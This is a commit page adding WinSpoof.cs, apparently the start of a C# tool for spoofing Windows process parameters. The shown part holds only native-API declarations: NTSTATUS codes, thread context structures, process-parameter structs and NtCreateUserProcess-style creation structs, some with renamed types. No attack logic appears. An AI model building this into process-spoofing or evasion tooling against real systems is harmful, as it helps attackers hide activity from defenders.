Projects STRLCPY WinSpoof Commits 39748070
🤬
  • ■ ■ ■ ■ ■ ■
    WinSpoof.cs
     1 +using System;
     2 +using System.Runtime.InteropServices;
     3 +using System.Threading;
     4 +using System.Diagnostics;
     5 +using System.Linq;
     6 +using System.Collections.Generic;
     7 +using System.Security;
     8 +using System.Text;
     9 +
     10 +
     11 +namespace WinSpoof
     12 +{
     13 +
     14 + class Program
     15 + {
     16 + public static ulong ptrToGS = 0;
     17 + public static System.IO.MemoryMappedFiles.MemoryMappedFile MemMapSystemMem = null;
     18 + public static System.IO.MemoryMappedFiles.MemoryMappedViewAccessor MemMapViewAccessor = null;
     19 + public static UNICODE_STRING ImagePath;
     20 + public static RTL_USER_PROCESS_PARAMETERS_64 ProcessParams64 = new RTL_USER_PROCESS_PARAMETERS_64();
     21 + public static IntPtr ProcessParams = IntPtr.Zero;
     22 + public static ulong SuspendCount = 0;
     23 + public static IntPtr RemoteProcess = IntPtr.Zero;
     24 + public static IntPtr NewRemoteThread = IntPtr.Zero;
     25 + public static IntPtr processParameters = IntPtr.Zero;
     26 + public static IntPtr PtrToImagePath = IntPtr.Zero;
     27 + public static PsCreateInfo info = new PsCreateInfo();
     28 + public static PsAttributeList attributeList = new PsAttributeList();
     29 +
     30 + public enum NTSTATUS : uint
     31 + {
     32 + // Success
     33 + Success = 0x00000000,
     34 + Wait0 = 0x00000000,
     35 + Wait1 = 0x00000001,
     36 + Wait2 = 0x00000002,
     37 + Wait3 = 0x00000003,
     38 + Wait63 = 0x0000003f,
     39 + Abandoned = 0x00000080,
     40 + AbandonedWait0 = 0x00000080,
     41 + AbandonedWait1 = 0x00000081,
     42 + AbandonedWait2 = 0x00000082,
     43 + AbandonedWait3 = 0x00000083,
     44 + AbandonedWait63 = 0x000000bf,
     45 + UserApc = 0x000000c0,
     46 + KernelApc = 0x00000100,
     47 + Alerted = 0x00000101,
     48 + Timeout = 0x00000102,
     49 + Pending = 0x00000103,
     50 + Reparse = 0x00000104,
     51 + MoreEntries = 0x00000105,
     52 + NotAllAssigned = 0x00000106,
     53 + SomeNotMapped = 0x00000107,
     54 + OpLockBreakInProgress = 0x00000108,
     55 + VolumeMounted = 0x00000109,
     56 + RxActCommitted = 0x0000010a,
     57 + NotifyCleanup = 0x0000010b,
     58 + NotifyEnumDir = 0x0000010c,
     59 + NoQuotasForAccount = 0x0000010d,
     60 + PrimaryTransportConnectFailed = 0x0000010e,
     61 + PageFaultTransition = 0x00000110,
     62 + PageFaultDemandZero = 0x00000111,
     63 + PageFaultCopyOnWrite = 0x00000112,
     64 + PageFaultGuardPage = 0x00000113,
     65 + PageFaultPagingFile = 0x00000114,
     66 + CrashDump = 0x00000116,
     67 + ReparseObject = 0x00000118,
     68 + NothingToTerminate = 0x00000122,
     69 + ProcessNotInJob = 0x00000123,
     70 + ProcessInJob = 0x00000124,
     71 + ProcessCloned = 0x00000129,
     72 + FileLockedWithOnlyReaders = 0x0000012a,
     73 + FileLockedWithWriters = 0x0000012b,
     74 +
     75 + // Informational
     76 + Informational = 0x40000000,
     77 + ObjectNameExists = 0x40000000,
     78 + ThreadWasSuspended = 0x40000001,
     79 + WorkingSetLimitRange = 0x40000002,
     80 + ImageNotAtBase = 0x40000003,
     81 + RegistryRecovered = 0x40000009,
     82 +
     83 + // Warning
     84 + Warning = 0x80000000,
     85 + GuardPageViolation = 0x80000001,
     86 + DatatypeMisalignment = 0x80000002,
     87 + Breakpoint = 0x80000003,
     88 + SingleStep = 0x80000004,
     89 + BufferOverflow = 0x80000005,
     90 + NoMoreFiles = 0x80000006,
     91 + HandlesClosed = 0x8000000a,
     92 + PartialCopy = 0x8000000d,
     93 + DeviceBusy = 0x80000011,
     94 + InvalidEaName = 0x80000013,
     95 + EaListInconsistent = 0x80000014,
     96 + NoMoreEntries = 0x8000001a,
     97 + LongJump = 0x80000026,
     98 + DllMightBeInsecure = 0x8000002b,
     99 +
     100 + // Error
     101 + Error = 0xc0000000,
     102 + Unsuccessful = 0xc0000001,
     103 + NotImplemented = 0xc0000002,
     104 + InvalidInfoClass = 0xc0000003,
     105 + InfoLengthMismatch = 0xc0000004,
     106 + AccessViolation = 0xc0000005,
     107 + InPageError = 0xc0000006,
     108 + PagefileQuota = 0xc0000007,
     109 + InvalRunPEdle = 0xc0000008,
     110 + BadInitialStack = 0xc0000009,
     111 + BadInitialPc = 0xc000000a,
     112 + InvalidCid = 0xc000000b,
     113 + TimerNotCanceled = 0xc000000c,
     114 + InvalidParameter = 0xc000000d,
     115 + NoSuchDevice = 0xc000000e,
     116 + NoSuchFile = 0xc000000f,
     117 + InvalidDeviceRequest = 0xc0000010,
     118 + EndOfFile = 0xc0000011,
     119 + WrongVolume = 0xc0000012,
     120 + NoMediaInDevice = 0xc0000013,
     121 + NoMemory = 0xc0000017,
     122 + ConflictingAddresses = 0xc0000018,
     123 + NotMappedView = 0xc0000019,
     124 + UnableToFreeVm = 0xc000001a,
     125 + UnableToDeleteSection = 0xc000001b,
     126 + IllegalInstruction = 0xc000001d,
     127 + AlreadyCommitted = 0xc0000021,
     128 + AccessDenied = 0xc0000022,
     129 + BufferTooSmall = 0xc0000023,
     130 + ObjectTypeMismatch = 0xc0000024,
     131 + NonContinuableException = 0xc0000025,
     132 + BadStack = 0xc0000028,
     133 + NotLocked = 0xc000002a,
     134 + NotCommitted = 0xc000002d,
     135 + InvalidParameterMix = 0xc0000030,
     136 + ObjectNameInvalid = 0xc0000033,
     137 + ObjectNameNotFound = 0xc0000034,
     138 + ObjectNameCollision = 0xc0000035,
     139 + ObjectPathInvalid = 0xc0000039,
     140 + ObjectPathNotFound = 0xc000003a,
     141 + ObjectPathSyntaxBad = 0xc000003b,
     142 + DataOverrun = 0xc000003c,
     143 + DataLate = 0xc000003d,
     144 + DataError = 0xc000003e,
     145 + CrcError = 0xc000003f,
     146 + SectionTooBig = 0xc0000040,
     147 + PortConnectionRefused = 0xc0000041,
     148 + InvalidPortHandle = 0xc0000042,
     149 + SharingViolation = 0xc0000043,
     150 + QuotaExceeded = 0xc0000044,
     151 + InvalidPageProtection = 0xc0000045,
     152 + MutantNotOwned = 0xc0000046,
     153 + SemaphoreLimitExceeded = 0xc0000047,
     154 + PortAlreadySet = 0xc0000048,
     155 + SectionNotImage = 0xc0000049,
     156 + SuspendCountExceeded = 0xc000004a,
     157 + ThreadIsTerminating = 0xc000004b,
     158 + BadWorkingSetLimit = 0xc000004c,
     159 + IncompatibleFileMap = 0xc000004d,
     160 + SectionProtection = 0xc000004e,
     161 + EasNotSupported = 0xc000004f,
     162 + EaTooLarge = 0xc0000050,
     163 + NonExistentEaEntry = 0xc0000051,
     164 + NoEasOnFile = 0xc0000052,
     165 + EaCorruptError = 0xc0000053,
     166 + FileLockConflict = 0xc0000054,
     167 + LockNotGranted = 0xc0000055,
     168 + DeletePending = 0xc0000056,
     169 + CtlFileNotSupported = 0xc0000057,
     170 + UnknownRevision = 0xc0000058,
     171 + RevisionMismatch = 0xc0000059,
     172 + InvalidOwner = 0xc000005a,
     173 + InvalidPrimaryGroup = 0xc000005b,
     174 + NoImpersonationToken = 0xc000005c,
     175 + CantDisableMandatory = 0xc000005d,
     176 + NoLogonServers = 0xc000005e,
     177 + NoSuchLogonSession = 0xc000005f,
     178 + NoSuchPrivilege = 0xc0000060,
     179 + PrivilegeNotHeld = 0xc0000061,
     180 + InvalidAccountName = 0xc0000062,
     181 + UserExists = 0xc0000063,
     182 + NoSuchUser = 0xc0000064,
     183 + GroupExists = 0xc0000065,
     184 + NoSuchGroup = 0xc0000066,
     185 + MemberInGroup = 0xc0000067,
     186 + MemberNotInGroup = 0xc0000068,
     187 + LastAdmin = 0xc0000069,
     188 + WrongPassword = 0xc000006a,
     189 + IllFormedPassword = 0xc000006b,
     190 + PasswordRestriction = 0xc000006c,
     191 + LogonFailure = 0xc000006d,
     192 + AccountRestriction = 0xc000006e,
     193 + InvalidLogonHours = 0xc000006f,
     194 + InvalidWorkstation = 0xc0000070,
     195 + PasswordExpired = 0xc0000071,
     196 + AccountDisabled = 0xc0000072,
     197 + NoneMapped = 0xc0000073,
     198 + TooManyLuidsRequested = 0xc0000074,
     199 + LuidsExhausted = 0xc0000075,
     200 + InvalidSubAuthority = 0xc0000076,
     201 + InvalidAcl = 0xc0000077,
     202 + InvalidSid = 0xc0000078,
     203 + InvalidSecurityDescr = 0xc0000079,
     204 + ProcedureNotFound = 0xc000007a,
     205 + InvalidImageFormat = 0xc000007b,
     206 + NoToken = 0xc000007c,
     207 + BadInheritanceAcl = 0xc000007d,
     208 + RangeNotLocked = 0xc000007e,
     209 + DiskFull = 0xc000007f,
     210 + ServerDisabled = 0xc0000080,
     211 + ServerNotDisabled = 0xc0000081,
     212 + TooManyGuidsRequested = 0xc0000082,
     213 + GuidsExhausted = 0xc0000083,
     214 + InvalidIdAuthority = 0xc0000084,
     215 + AgentsExhausted = 0xc0000085,
     216 + InvalidVolumeLabel = 0xc0000086,
     217 + SectionNotExtended = 0xc0000087,
     218 + NotMappedData = 0xc0000088,
     219 + ResourceDataNotFound = 0xc0000089,
     220 + ResourceTypeNotFound = 0xc000008a,
     221 + ResourceNameNotFound = 0xc000008b,
     222 + ArrayBoundsExceeded = 0xc000008c,
     223 + FloatDenormalOperand = 0xc000008d,
     224 + FloatDivideByZero = 0xc000008e,
     225 + FloatInexactResult = 0xc000008f,
     226 + FloatInvalidOperation = 0xc0000090,
     227 + FloatOverflow = 0xc0000091,
     228 + FloatStackCheck = 0xc0000092,
     229 + FloatUnderflow = 0xc0000093,
     230 + IntegerDivideByZero = 0xc0000094,
     231 + IntegerOverflow = 0xc0000095,
     232 + PrivilegedInstruction = 0xc0000096,
     233 + TooManyPagingFiles = 0xc0000097,
     234 + FileInvalid = 0xc0000098,
     235 + InsufficientResources = 0xc000009a,
     236 + InstanceNotAvailable = 0xc00000ab,
     237 + PipeNotAvailable = 0xc00000ac,
     238 + InvalidPipeState = 0xc00000ad,
     239 + PipeBusy = 0xc00000ae,
     240 + IllegalFunction = 0xc00000af,
     241 + PipeDisconnected = 0xc00000b0,
     242 + PipeClosing = 0xc00000b1,
     243 + PipeConnected = 0xc00000b2,
     244 + PipeListening = 0xc00000b3,
     245 + InvalidReadMode = 0xc00000b4,
     246 + IoTimeout = 0xc00000b5,
     247 + FileForcedClosed = 0xc00000b6,
     248 + ProfilingNotStarted = 0xc00000b7,
     249 + ProfilingNotStopped = 0xc00000b8,
     250 + NotSameDevice = 0xc00000d4,
     251 + FileRenamed = 0xc00000d5,
     252 + CantWait = 0xc00000d8,
     253 + PipeEmpty = 0xc00000d9,
     254 + CantTerminateSelf = 0xc00000db,
     255 + InternalError = 0xc00000e5,
     256 + InvalidParameter1 = 0xc00000ef,
     257 + InvalidParameter2 = 0xc00000f0,
     258 + InvalidParameter3 = 0xc00000f1,
     259 + InvalidParameter4 = 0xc00000f2,
     260 + InvalidParameter5 = 0xc00000f3,
     261 + InvalidParameter6 = 0xc00000f4,
     262 + InvalidParameter7 = 0xc00000f5,
     263 + InvalidParameter8 = 0xc00000f6,
     264 + InvalidParameter9 = 0xc00000f7,
     265 + InvalidParameter10 = 0xc00000f8,
     266 + InvalidParameter11 = 0xc00000f9,
     267 + InvalidParameter12 = 0xc00000fa,
     268 + ProcessIsTerminating = 0xc000010a,
     269 + MappedFileSizeZero = 0xc000011e,
     270 + TooManyOpenedFiles = 0xc000011f,
     271 + Cancelled = 0xc0000120,
     272 + CannotDelete = 0xc0000121,
     273 + InvalidComputerName = 0xc0000122,
     274 + FileDeleted = 0xc0000123,
     275 + SpecialAccount = 0xc0000124,
     276 + SpecialGroup = 0xc0000125,
     277 + SpecialUser = 0xc0000126,
     278 + MembersPrimaryGroup = 0xc0000127,
     279 + FileClosed = 0xc0000128,
     280 + TooManyThreads = 0xc0000129,
     281 + ThreadNotInProcess = 0xc000012a,
     282 + TokenAlreadyInUse = 0xc000012b,
     283 + PagefileQuotaExceeded = 0xc000012c,
     284 + CommitmentLimit = 0xc000012d,
     285 + InvalidImageLeFormat = 0xc000012e,
     286 + InvalidImageNotMz = 0xc000012f,
     287 + InvalidImageProtect = 0xc0000130,
     288 + InvalidImageWin16 = 0xc0000131,
     289 + LogonServer = 0xc0000132,
     290 + DifferenceAtDc = 0xc0000133,
     291 + SynchronizationRequired = 0xc0000134,
     292 + DllNotFound = 0xc0000135,
     293 + IoPrivilegeFailed = 0xc0000137,
     294 + OrdinalNotFound = 0xc0000138,
     295 + EntryPointNotFound = 0xc0000139,
     296 + ControlCExit = 0xc000013a,
     297 + InvalidAddress = 0xc0000141,
     298 + PortNotSet = 0xc0000353,
     299 + DebuggerInactive = 0xc0000354,
     300 + CallbackBypass = 0xc0000503,
     301 + PortClosed = 0xc0000700,
     302 + MessageLost = 0xc0000701,
     303 + InvalidMessage = 0xc0000702,
     304 + RequestCanceled = 0xc0000703,
     305 + RecursiveDispatch = 0xc0000704,
     306 + LpcReceiveBufferExpected = 0xc0000705,
     307 + LpcInvalidConnectionUsage = 0xc0000706,
     308 + LpcRequestsNotAllowed = 0xc0000707,
     309 + ResourceInUse = 0xc0000708,
     310 + ProcessIsProtected = 0xc0000712,
     311 + VolumeDirty = 0xc0000806,
     312 + FileCheckedOut = 0xc0000901,
     313 + CheckOutRequired = 0xc0000902,
     314 + BadFileType = 0xc0000903,
     315 + FileTooLarge = 0xc0000904,
     316 + FormsAuthRequired = 0xc0000905,
     317 + VirusInfected = 0xc0000906,
     318 + VirusDeleted = 0xc0000907,
     319 + TransactionalConflict = 0xc0190001,
     320 + InvalidTransaction = 0xc0190002,
     321 + TransactionNotActive = 0xc0190003,
     322 + TmInitializationFailed = 0xc0190004,
     323 + RmNotActive = 0xc0190005,
     324 + RmMetadataCorrupt = 0xc0190006,
     325 + TransactionNotJoined = 0xc0190007,
     326 + DirectoryNotRm = 0xc0190008,
     327 + CouldNotResizeLog = 0xc0190009,
     328 + TransactionsUnsupportedRemote = 0xc019000a,
     329 + LogResizeInvalidSize = 0xc019000b,
     330 + RemoteFileVersionMismatch = 0xc019000c,
     331 + CrmProtocolAlreadyExists = 0xc019000f,
     332 + TransactionPropagationFailed = 0xc0190010,
     333 + CrmProtocolNotFound = 0xc0190011,
     334 + TransactionSuperiorExists = 0xc0190012,
     335 + TransactionRequestNotValid = 0xc0190013,
     336 + TransactionNotRequested = 0xc0190014,
     337 + TransactionAlreadyAborted = 0xc0190015,
     338 + TransactionAlreadyCommitted = 0xc0190016,
     339 + TransactionInvalidMarshallBuffer = 0xc0190017,
     340 + CurrentTransactionNotValid = 0xc0190018,
     341 + LogGrowthFailed = 0xc0190019,
     342 + ObjectNoLongerExists = 0xc0190021,
     343 + StreamMiniversionNotFound = 0xc0190022,
     344 + StreamMiniversionNotValid = 0xc0190023,
     345 + MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
     346 + CantOpenMiniversionWithModifyIntent = 0xc0190025,
     347 + CantCreateMoreStreamMiniversions = 0xc0190026,
     348 + HandleNoLongerValid = 0xc0190028,
     349 + NoTxfMetadata = 0xc0190029,
     350 + LogCorruptionDetected = 0xc0190030,
     351 + CantRecoverWithHandleOpen = 0xc0190031,
     352 + RmDisconnected = 0xc0190032,
     353 + EnlistmentNotSuperior = 0xc0190033,
     354 + RecoveryNotNeeded = 0xc0190034,
     355 + RmAlreadyStarted = 0xc0190035,
     356 + FileIdentityNotPersistent = 0xc0190036,
     357 + CantBreakTransactionalDependency = 0xc0190037,
     358 + CantCrossRmBoundary = 0xc0190038,
     359 + TxfDirNotEmpty = 0xc0190039,
     360 + IndoubtTransactionsExist = 0xc019003a,
     361 + TmVolatile = 0xc019003b,
     362 + RollbackTimerExpired = 0xc019003c,
     363 + TxfAttributeCorrupt = 0xc019003d,
     364 + EfsNotAllowedInTransaction = 0xc019003e,
     365 + TransactionalOpenNotAllowed = 0xc019003f,
     366 + TransactedMappingUnsupportedRemote = 0xc0190040,
     367 + TxfMetadataAlreadyPresent = 0xc0190041,
     368 + TransactionScopeCallbacksNotSet = 0xc0190042,
     369 + TransactionRequiredPromotion = 0xc0190043,
     370 + CannotExecuteFileInTransaction = 0xc0190044,
     371 + TransactionsNotFrozen = 0xc0190045,
     372 + MaximumNtStatus = 0xffffffff
     373 + }
     374 +
     375 +
     376 + // x64 context structure
     377 + [StructLayout(LayoutKind.Sequential, Pack = 16)]
     378 + public struct CONTEXT64
     379 + {
     380 + public ulong P1Home;
     381 + public ulong P2Home;
     382 + public ulong P3Home;
     383 + public ulong P4Home;
     384 + public ulong P5Home;
     385 + public ulong P6Home;
     386 +
     387 + public CONTEXT_FLAGS ContextFlags;
     388 + public uint MxCsr;
     389 +
     390 + public ushort SegCs;
     391 + public ushort SegDs;
     392 + public ushort SegEs;
     393 + public ushort SegFs;
     394 + public ushort SegGs;
     395 + public ushort SegSs;
     396 + public uint EFlags;
     397 +
     398 + public ulong Dr0;
     399 + public ulong Dr1;
     400 + public ulong Dr2;
     401 + public ulong Dr3;
     402 + public ulong Dr6;
     403 + public ulong Dr7;
     404 +
     405 + public ulong Rax;
     406 + public ulong Rcx;
     407 + public ulong Rdx;
     408 + public ulong Rbx;
     409 + public ulong Rsp;
     410 + public ulong Rbp;
     411 + public ulong Rsi;
     412 + public ulong Rdi;
     413 + public ulong R8;
     414 + public ulong R9;
     415 + public ulong R10;
     416 + public ulong R11;
     417 + public ulong R12;
     418 + public ulong R13;
     419 + public ulong R14;
     420 + public ulong R15;
     421 + public ulong Rip;
     422 +
     423 + public XSAVE_FORMAT64 DUMMYUNIONNAME;
     424 +
     425 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
     426 + public M128A[] VectorRegister;
     427 + public ulong VectorControl;
     428 +
     429 + public ulong DebugControl;
     430 + public ulong LastBranchToRip;
     431 + public ulong LastBranchFromRip;
     432 + public ulong LastExceptionToRip;
     433 + public ulong LastExceptionFromRip;
     434 + }
     435 +
     436 + public enum CONTEXT_FLAGS : uint
     437 + {
     438 + CONTEXT_i386 = 0x10000,
     439 + CONTEXT_i486 = 0x10000,
     440 + CONTEXT_CONTROL = CONTEXT_i386 | 0x01,
     441 + CONTEXT_INTEGER = CONTEXT_i386 | 0x02,
     442 + CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04,
     443 + CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08,
     444 + CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10,
     445 + CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20,
     446 + CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
     447 + CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
     448 + }
     449 +
     450 + [Flags]
     451 + public enum MemoryProtection : uint
     452 + {
     453 + AccessDenied = 0x0,
     454 + Execute = 0x10,
     455 + ExecuteRead = 0x20,
     456 + ExecuteReadWrite = 0x40,
     457 + ExecuteWriteCopy = 0x80,
     458 + Guard = 0x100,
     459 + NoCache = 0x200,
     460 + WriteCombine = 0x400,
     461 + NoAccess = 0x01,
     462 + ReadOnly = 0x02,
     463 + ReadWrite = 0x04,
     464 + WriteCopy = 0x08
     465 + }
     466 +
     467 + [StructLayout(LayoutKind.Explicit, Size = 8)]
     468 + public struct LARGE_INTEGER
     469 + {
     470 + [FieldOffset(0)] public long QuadPart;
     471 + [FieldOffset(0)] public uint LowPart;
     472 + [FieldOffset(4)] public int HighPart;
     473 + [FieldOffset(0)] public int LowPartAsInt;
     474 + [FieldOffset(0)] public uint LowPartAsUInt;
     475 + [FieldOffset(4)] public int HighPartAsInt;
     476 + [FieldOffset(4)] public uint HighPartAsUInt;
     477 +
     478 + public long ToInt64()
     479 + {
     480 + return ((long)this.HighPart << 32) | (uint)this.LowPartAsInt;
     481 + }
     482 + public static LARGE_INTEGER Convert(long value)
     483 + {
     484 + return new LARGE_INTEGER
     485 + {
     486 + LowPartAsInt = (int)(value),
     487 + HighPartAsInt = (int)((value >> 32))
     488 + };
     489 + }
     490 + }
     491 +
     492 + [Flags]
     493 + public enum CORE_Flags : uint
     494 + {
     495 + None = 0,
     496 + INHERIT = 1
     497 + }
     498 +
     499 + public enum CORE_INFORMATION_CLASS
     500 + {
     501 + ProcessBasicInformation = 0x00,
     502 + ProcessQuotaLimits = 0x01,
     503 + ProcessIoCounters = 0x02,
     504 + ProcessVmCounters = 0x03,
     505 + ProcessTimes = 0x04,
     506 + ProcessBasePriority = 0x05,
     507 + ProcessRaisePriority = 0x06,
     508 + ProcessDebugPort = 0x07,
     509 + ProcessExceptionPort = 0x08,
     510 + ProcessAccessToken = 0x09,
     511 + ProcessLdtInformation = 0x0A,
     512 + ProcessLdtSize = 0x0B,
     513 + ProcessDefaultHardErrorMode = 0x0C,
     514 + ProcessIoPortHandlers = 0x0D,
     515 + ProcessPooledUsageAndLimits = 0x0E,
     516 + ProcessWorkingSetWatch = 0x0F,
     517 + ProcessUserModeIOPL = 0x10,
     518 + ProcessEnableAlignmentFaultFixup = 0x11,
     519 + ProcessPriorityClass = 0x12,
     520 + ProcessWx86Information = 0x13,
     521 + ProcessHandleCount = 0x14,
     522 + ProcessAffinityMask = 0x15,
     523 + ProcessPriorityBoost = 0x16,
     524 + ProcessDeviceMap = 0x17,
     525 + ProcessSessionInformation = 0x18,
     526 + ProcessForegroundInformation = 0x19,
     527 + ProcessWow64Information = 0x1A,
     528 + ProcessImageFileName = 0x1B,
     529 + ProcessLUIDDeviceMapsEnabled = 0x1C,
     530 + ProcessBreakOnTermination = 0x1D,
     531 + ProcessDebugObjectHandle = 0x1E,
     532 + ProcessDebugFlags = 0x1F,
     533 + ProcessHandleTracing = 0x20,
     534 + ProcessIoPriority = 0x21,
     535 + ProcessExecuteFlags = 0x22,
     536 + ProcessResourceManagement = 0x23,
     537 + ProcessCookie = 0x24,
     538 + ProcessImageInformation = 0x25,
     539 + ProcessCycleTime = 0x26,
     540 + ProcessPagePriority = 0x27,
     541 + ProcessInstrumentationCallback = 0x28,
     542 + ProcessThreadStackAllocation = 0x29,
     543 + ProcessWorkingSetWatchEx = 0x2A,
     544 + ProcessImageFileNameWin32 = 0x2B,
     545 + ProcessImageFileMapping = 0x2C,
     546 + ProcessAffinityUpdateMode = 0x2D,
     547 + ProcessMemoryAllocationMode = 0x2E,
     548 + ProcessGroupInformation = 0x2F,
     549 + ProcessTokenVirtualizationEnabled = 0x30,
     550 + ProcessConsoleHostProcess = 0x31,
     551 + ProcessWindowInformation = 0x32,
     552 + ProcessHandleInformation = 0x33,
     553 + ProcessMitigationPolicy = 0x34,
     554 + ProcessDynamicFunctionTableInformation = 0x35,
     555 + ProcessHandleCheckingMode = 0x36,
     556 + ProcessKeepAliveCount = 0x37,
     557 + ProcessRevokeFileHandles = 0x38,
     558 + ProcessWorkingSetControl = 0x39,
     559 + ProcessHandleTable = 0x3A,
     560 + ProcessCheckStackExtentsMode = 0x3B,
     561 + ProcessCommandLineInformation = 0x3C,
     562 + ProcessProtectionInformation = 0x3D,
     563 + ProcessMemoryExhaustion = 0x3E,
     564 + ProcessFaultInformation = 0x3F,
     565 + ProcessTelemetryIdInformation = 0x40,
     566 + ProcessCommitReleaseInformation = 0x41,
     567 + ProcessDefaultCpuSetsInformation = 0x42,
     568 + ProcessAllowedCpuSetsInformation = 0x43,
     569 + ProcessSubsystemProcess = 0x44,
     570 + ProcessJobMemoryInformation = 0x45,
     571 + ProcessInPrivate = 0x46,
     572 + ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
     573 + ProcessIumChallengeResponse = 0x48,
     574 + ProcessChildProcessInformation = 0x49,
     575 + ProcessHighGraphicsPriorityInformation = 0x4A,
     576 + ProcessSubsystemInformation = 0x4B,
     577 + ProcessEnergyValues = 0x4C,
     578 + ProcessActivityThrottleState = 0x4D,
     579 + ProcessActivityThrottlePolicy = 0x4E,
     580 + ProcessWin32kSyscallFilterInformation = 0x4F,
     581 + ProcessDisableSystemAllowedCpuSets = 0x50,
     582 + ProcessWakeInformation = 0x51,
     583 + ProcessEnergyTrackingState = 0x52,
     584 + ProcessManageWritesToExecutableMemory = 0x53,
     585 + ProcessCaptureTrustletLiveDump = 0x54,
     586 + ProcessTelemetryCoverage = 0x55,
     587 + ProcessEnclaveInformation = 0x56,
     588 + ProcessEnableReadWriteVmLogging = 0x57,
     589 + ProcessUptimeInformation = 0x58,
     590 + ProcessImageSection = 0x59,
     591 + ProcessDebugAuthInformation = 0x5A,
     592 + ProcessSystemResourceManagement = 0x5B,
     593 + ProcessSequenceNumber = 0x5C,
     594 + ProcessLoaderDetour = 0x5D,
     595 + ProcessSecurityDomainInformation = 0x5E,
     596 + ProcessCombineSecurityDomainsInformation = 0x5F,
     597 + ProcessEnableLogging = 0x60,
     598 + ProcessLeapSecondInformation = 0x61,
     599 + ProcessFiberShadowStackAllocation = 0x62,
     600 + ProcessFreeFiberShadowStackAllocation = 0x63,
     601 + MaxProcessInfoClass = 0x64
     602 + };
     603 +
     604 + [StructLayout(LayoutKind.Sequential)]
     605 + public struct RTL_USER_PROCESS_PARAMETERS_64
     606 + {
     607 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
     608 + public byte[] Reserved1;
     609 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
     610 + public IntPtr[] Reserved2;
     611 + public UNICODE_STRING64 CurrentDirectoryPath;
     612 + public UNICODE_STRING64 DllPath;
     613 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
     614 + public IntPtr[] Reserved2b;
     615 + public UNICODE_STRING64 ImagePathName;
     616 + public UNICODE_STRING64 CommandLine;
     617 + public UInt64 Environment;
     618 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 9)]
     619 + public IntPtr[] Reserved3;
     620 + public UNICODE_STRING64 WindowTitle;
     621 + public UNICODE_STRING64 DesktopName;
     622 + public UNICODE_STRING64 ShellInfo;
     623 + public UNICODE_STRING64 RuntimeData;
     624 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 32 * 6)]
     625 + public IntPtr[] Reserved4;
     626 + public uint EnvironmentSize;
     627 + }
     628 +
     629 + [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack=0)]
     630 + public struct UNICODE_STRING
     631 + {
     632 + public ushort Length;
     633 + public ushort MaximumLength;
     634 + public IntPtr Buffer;
     635 + }
     636 +
     637 + [StructLayout(LayoutKind.Sequential)]
     638 + public struct UNICODE_STRING64
     639 + {
     640 + public ushort Length;
     641 + public ushort MaximumLength;
     642 + public UInt32 __padding;
     643 + public UInt64 Buffer;
     644 + }
     645 +
     646 + [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential)]
     647 + public struct CORE_BASIS
     648 + {
     649 + public IntPtr ExitStatus;
     650 + public IntPtr PebBaseAddress;
     651 + public IntPtr AffinityMask;
     652 + public IntPtr BasePriority;
     653 + public IntPtr UniqueProcessId;
     654 + public IntPtr InheritedFromUniqueProcessId;
     655 + }
     656 +
     657 + // x64 save format
     658 + [StructLayout(LayoutKind.Sequential, Pack = 16)]
     659 + public struct XSAVE_FORMAT64
     660 + {
     661 + public ushort ControlWord;
     662 + public ushort StatusWord;
     663 + public byte TagWord;
     664 + public byte Reserved1;
     665 + public ushort ErrorOpcode;
     666 + public uint ErrorOffset;
     667 + public ushort ErrorSelector;
     668 + public ushort Reserved2;
     669 + public uint DataOffset;
     670 + public ushort DataSelector;
     671 + public ushort Reserved3;
     672 + public uint MxCsr;
     673 + public uint MxCsr_Mask;
     674 +
     675 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
     676 + public M128A[] FloatRegisters;
     677 +
     678 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
     679 + public M128A[] XmmRegisters;
     680 +
     681 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
     682 + public byte[] Reserved4;
     683 + }
     684 +
     685 + [StructLayout(LayoutKind.Sequential)]
     686 + public struct M128A
     687 + {
     688 + public ulong High;
     689 + public long Low;
     690 +
     691 + public override string ToString()
     692 + {
     693 + return string.Format("High:{0}, Low:{1}", this.High, this.Low);
     694 + }
     695 + }
     696 +
     697 + public static List<IntPtr> Allocated = new List<IntPtr>();
     698 + public static UNICODE_STRING ConvertToUnicode(string data)
     699 + {
     700 + UNICODE_STRING StringObject = new UNICODE_STRING();
     701 + StringObject.Length = (ushort)(data.Length * 2);
     702 + StringObject.MaximumLength = (ushort)(StringObject.Length + 1);
     703 + StringObject.Buffer = Marshal.StringToHGlobalUni(data);
     704 + Allocated.Add(StringObject.Buffer);
     705 + return StringObject;
     706 + }
     707 +
     708 + [StructLayout(LayoutKind.Explicit, Size = 88)]
     709 + public unsafe struct PsCreateInfo
     710 + {
     711 + [FieldOffset(0)] public UIntPtr Size;
     712 + [FieldOffset(8)] public PsCreateState State;
     713 + [FieldOffset(16)] public fixed byte Filter[72];
     714 + }
     715 +
     716 + public enum PsCreateState
     717 + {
     718 + PsCreateInitialState,
     719 + PsCreateFailOnFileOpen,
     720 + PsCreateFailOnSectionCreate,
     721 + PsCreateFailExeFormat,
     722 + PsCreateFailMachineMismatch,
     723 + PsCreateFailExeName,
     724 + PsCreateSuccess,
     725 + PsCreateMaximumStates
     726 + }
     727 +
     728 + [StructLayout(LayoutKind.Sequential)]
     729 + public struct PsAtrribute
     730 + {
     731 + public uint Attribute;
     732 + public UIntPtr Size;
     733 + public IntPtr Value;
     734 + public IntPtr ReturnLength;
     735 +
     736 + }
